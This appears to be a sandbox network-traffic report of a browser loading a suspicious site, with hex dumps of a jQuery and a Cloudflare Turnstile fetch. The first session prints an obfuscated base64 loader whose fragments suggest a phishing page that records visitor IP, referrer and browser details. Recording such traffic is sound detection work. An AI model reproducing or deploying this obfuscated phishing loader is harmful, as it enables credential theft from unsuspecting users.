                                                                    2024-05-24 03:01:59 UTC1369INData Raw: 31 34 32 32 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47
                                                                    Data Ascii: 1422<script>document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbG
                                                                    2024-05-24 03:01:59 UTC1369INData Raw: 64 47 38 37 64 32 6c 6b 64 47 67 36 4d 7a 4d 75 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 6c 4f 33 30 4e 43 6e 30 4e 43 69 4e 44 62 6b 6c 53 54 47 78 76 63 6d 4e 59 49 43 35 6b 61 58 4e 77 62 47 46 35 4c 54 51 67 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 53 34 79 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 4e 75 53 56 4a 4d 62 47 39 79 59 31 67 67 4c 6d 31 30 4c 54 49 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 41 75 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 4e 75 53 56 4a 4d 62 47 39 79 59 31 67 67 4c 6d 67 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 47 4e 68 62 47 4d 6f 4c 6a 6b 77 4d 48 4a 6c 62 53 41 72 49 43 34 7a 64 6e 63 70 4f 33 30 4e 43 69 4e 44 62 6b 6c
                                                                    Data Ascii: dG87d2lkdGg6MzMuMzMzMzMzMzMlO30NCn0NCiNDbklSTGxvcmNYIC5kaXNwbGF5LTQge2ZvbnQtc2l6ZTogMS4yNXJlbSFpbXBvcnRhbnQ7fQ0KI0NuSVJMbG9yY1ggLm10LTIge21hcmdpbi10b3A6IDAuNXJlbSFpbXBvcnRhbnQ7fQ0KI0NuSVJMbG9yY1ggLmg0IHtmb250LXNpemU6IGNhbGMoLjkwMHJlbSArIC4zdncpO30NCiNDbkl
                                                                    2024-05-24 03:01:59 UTC1369INData Raw: 69 42 32 59 57 78 31 5a 54 30 69 4f 43 34 30 4e 69 34 78 4d 6a 4d 75 4d 54 63 31 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 47 39 31 5a 47 4a 35 64 47 56 70 64 43 35 6a 62 79 35 36 59 53 38 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 31 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 56 68 49 69 42 32 59 57 78 31 5a 54 30 69 54 57 39 36 61 57 78 73 59 53 38 31 4c 6a 41 67 4b 46 64 70 62 6d 52 76 64 33 4d 67 54 6c 51 67 4d 54 41 75
                                                                    Data Ascii: iB2YWx1ZT0iOC40Ni4xMjMuMTc1Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iaHR0cHM6Ly9jbG91ZGJ5dGVpdC5jby56YS8iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGR1YSIgbmFtZT0iYmx0ZHVhIiB2YWx1ZT0iTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAu
                                                                    2024-05-24 03:01:59 UTC1055INData Raw: 49 75 62 32 35 7a 64 57 4a 74 61 58 51 67 50 53 42 6d 64 57 35 6a 64 47 6c 76 62 69 41 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 76 59 33 56 74 5a 57 35 30 4c 6d 64 6c 64 45 56 73 5a 57 31 6c 62 6e 52 43 65 55 6c 6b 4b 43 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 70 4c 6e 5a 68 62 48 56 6c 49 44 30 67 4a 7a 5a 4f 63 47 35 32 4a 7a 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 64 6d 46 79 49 48 4a 4c 5a 31 5a 77 55 6b 4a 45 51 31 45 67 50 53 41 69 4c 69 34 76 62 47 39 36 65 46 46 79 56 6e 68 34 54 57 68 50 5a 7a 5a 6a 64 7a 52 49 55
                                                                    Data Ascii: Iub25zdWJtaXQgPSBmdW5jdGlvbiAoZXZlbnQpIHsNCiAgICAgICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIH07DQogICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJwYWdlbGluayIpLnZhbHVlID0gJzZOcG52JzsNCiAgICAgICAgdmFyIHJLZ1ZwUkJEQ1EgPSAiLi4vbG96eFFyVnh4TWhPZzZjdzRIU
                                                                    2024-05-24 03:01:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.1649721151.101.130.1374432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:59 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                    Host: code.jquery.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://ztyw.kensteg.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:00 UTC567INHTTP/1.1 200 OK
                                                                    Connection: close
                                                                    Content-Length: 89501
                                                                    Server: nginx
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                    ETag: "28feccc0-15d9d"
                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                    Access-Control-Allow-Origin: *
                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                    Accept-Ranges: bytes
                                                                    Age: 2375900
                                                                    Date: Fri, 24 May 2024 03:01:59 GMT
                                                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890099-NYC
                                                                    X-Cache: HIT, HIT
                                                                    X-Cache-Hits: 86, 0
                                                                    X-Timer: S1716519720.969571,VS0,VE1
                                                                    Vary: Accept-Encoding
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                    2024-05-24 03:02:00 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.1649722104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:59 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://ztyw.kensteg.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:00 UTC336INHTTP/1.1 302 Found
                                                                    Date: Fri, 24 May 2024 03:01:59 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    cross-origin-resource-policy: cross-origin
                                                                    cache-control: max-age=300, public
                                                                    access-control-allow-origin: *
                                                                    location: /turnstile/v0/b/695da7821231/api.js
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b59bef0c41d-EWR
                                                                    alt-svc: h3=":443"; ma=86400


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.1649723104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:00 UTC647OUTGET /turnstile/v0/b/695da7821231/api.js HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://ztyw.kensteg.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:00 UTC346INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:00 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 42527
                                                                    Connection: close
                                                                    cache-control: max-age=604800, public
                                                                    cross-origin-resource-policy: cross-origin
                                                                    access-control-allow-origin: *
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b5dece042b1-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:00 UTC1023INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 72 28 73 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74
                                                                    Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
